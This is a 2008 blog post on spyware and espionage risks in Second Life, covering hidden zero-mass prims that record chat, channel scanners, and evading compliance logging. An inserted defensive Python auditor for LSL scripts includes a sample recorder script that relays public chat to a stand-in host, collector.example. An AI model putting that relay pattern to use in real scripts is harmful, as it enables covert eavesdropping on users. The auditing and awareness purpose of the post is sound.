Zero Mass Tortured Prims Security and Spies in Second Life

Posted in 3D Social Networks, Second Life, Security, Video Games by wayne.porter on February 8th, 2008

I find it almost laughable that it took them this long to consider that virtual worlds held risks… let me respond to a few without revealing too much, e.g. object entry and sit.

U.S. intelligence officials are cautioning that popular Internet services that enable computer users to adopt cartoon-like personas in three-dimensional online spaces also are creating security vulnerabilities by opening novel ways for terrorists and criminals to move money, organize and conduct corporate espionage.

Over the last few years, “virtual worlds” such as Second Life and other role-playing games have become home to millions of computer-generated personas known as avatars. By directing their avatars, people can take on alternate personalities, socialize, explore and earn and spend money across uncharted online landscapes.

Security researchers have known this for a long time. It was clear to me that it was easier to jack a WoW account, chop shop and move it for far more than a card deal… and try explaining the theft of your level 60 mage to the cops. “Barney Fife saves the day and takes down another WoW accounts jacker… please return to saving your sector.”

“The virtual world is the next great frontier and in some respects is still very much a Wild West environment,” a recent paper by the government’s new Intelligence Advanced Research Projects Activity said.

“Unfortunately, what started out as a benign environment where people would congregate to share information or explore fantasy worlds is now offering the opportunity for religious/political extremists to recruit, rehearse, transfer money, and ultimately engage in information warfare or worse with impunity.”

Any medium that gathers mass is going to gather bad apples. In 2003 I explained how they could subvert CPA deals through rogue networks and generate self-sustaining cells that could launch blended attacks through this funding- trivial. In 2003 accountability just wasn’t that high on the list- it will be now.

Virtual worlds could also become an actual battlefield. The intelligence community has begun contemplating how to use Second Life and other such communities as platforms for cyber weapons that could be used against terrorists or enemies, intelligence officials said. One analyst suggested beginning tests with so-called teams of cyber warfare experts.

The IARPA paper concurred: “What additional things are possible in the virtual world that cannot be done in the real world? The [intelligence community] needs to ‘red team’ some possible scenarios of use.”

Virtual worlds are battlefields- what additional things are possible that cannot be done in the real world? Everything.

Compliance

Quick conclude. Publicly traded companies need to ensure communications, no matter how ephemeral, are logged. SOX, HIPAA, and e-discovery ensure that is so- this includes IM. Even so, it is not hard to jack into a world and run parallel with something like Skype that uses AES encryption and exhibits port agility to evade. I am not sure about SL’s native VoIP, but again, if they wish to offer compliance as a publicly traded company in the US, they MUST log all of this traffic.

Spyware

Spyware abounds in Second Life and, I will bet, other worlds. Commonly it uses zero-mass tortured prims; some use alpha textures, or are darted into an avatar or sprinkled on an area where having zero mass helps them hide. Best extraction I performed was multiple zero-mass tortured prims using sand as a texture and buried into the beach- each tested positive as scripted- kind of obvious- make your spyware big and. This was a smooth move, but when confronted he was hard pressed to say much. Women are commonly targeted; I frequently get requests for help and, based on my experience, it goes on in shops, anywhere.

These can record ambient chat conversation (channel 0) or open chat. Nor does moving up channels help. Brute force channel scanners can help you find commands, executions or conversations. Silent Life sounds quiet, but listen to the right channels and it is quite noisy. Bleys and I built an encrypted HUD (keyboard) as proof of concept. It works great; although it requires mouse input (which evades keyboard loggers), it is too slow yet, but it was fun in meetings to send encrypted messages and watch scanner rats go WTF? I had another application that would send in all kinds of crazy reports that brute scanner guys must have been puzzled by, as I would flood channels in the low range with messages that were worrisome.

Communication is going to happen, it will route around the damage, the best offense is awareness…the list goes on, but Virtual Worlds need more time to mature.

A good start, beyond accountability, would be to allow people to sandbox scripts to see what all they really do- code hygiene…I know it is a script, but what does it do or send?
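One way to ask "what does it do or send?" of a script whose source you can read, shown as an added example that is not code from the original post: a static audit that pairs each `llListen` channel with the LSL calls able to carry overheard text elsewhere. The two sample scripts and the `collector.example` URL are constructed for illustration.

```python
import re

# String literals are matched first so "http://..." is not mistaken for a comment.
TOKEN = re.compile(r'"(?:\\.|[^"\\])*"|//[^\n]*|/\*.*?\*/', re.S)
LISTEN = re.compile(r'\bllListen\s*\(\s*([^,]+?)\s*,')
# LSL calls that can carry overheard text away from where it was spoken.
OUTBOUND = ("llHTTPRequest", "llEmail", "llInstantMessage", "llRegionSay")

def audit_lsl(source):
    """Statically report what a script listens to and how it could send it on."""
    code = TOKEN.sub(lambda m: m.group(0) if m.group(0)[0] == '"' else " ", source)
    listeners = []
    for m in LISTEN.finditer(code):
        arg = m.group(1)
        if arg in ("0", "PUBLIC_CHANNEL"):
            kind = "public chat"
        elif re.fullmatch(r"-?\d+", arg):
            kind = "fixed channel"
        else:
            kind = "computed channel"   # decided at run time: needs a human look
        listeners.append((kind, arg))
    outbound = [f for f in OUTBOUND if re.search(r"\b" + f + r"\s*\(", code)]
    if outbound and any(k == "public chat" for k, _ in listeners):
        verdict = "relays-public-chat"
    elif outbound and listeners:
        verdict = "review"
    else:
        verdict = "no-relay-path"
    return listeners, outbound, verdict

# Constructed sample scripts (not taken from any real object).
SAMPLE_RECORDER = '''
default {
    state_entry() { llListen(0, "", NULL_KEY, ""); }
    listen(integer c, string n, key id, string m) {
        llHTTPRequest("http://collector.example/log", [], n + ": " + m);
    }
}'''
SAMPLE_DOOR = '''
// opens on owner command; llEmail is named only in this comment
default {
    state_entry() { llListen(-7731, "", llGetOwner(), "open"); }
    listen(integer c, string n, key id, string m) { llSetRot(ZERO_ROTATION); }
}'''

if __name__ == "__main__":
    for name, src in (("recorder", SAMPLE_RECORDER), ("door", SAMPLE_DOOR)):
        print(name, audit_lsl(src))
```

This only reads source text, so it cannot see inside no-modify objects and it does not replace running a script in isolation; a "computed channel" result means the channel is chosen at run time and needs manual review.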

Coming soon- social engineering in virtual worlds. Far too easy…people need more training…after that prepare for an epic battle…


One Response to “Zero Mass Tortured Prims Security and Spies in Second Life”

  1. amilie anatine Says:

    this is a great article and i agree 100% - feel free to say hi in world, amilie
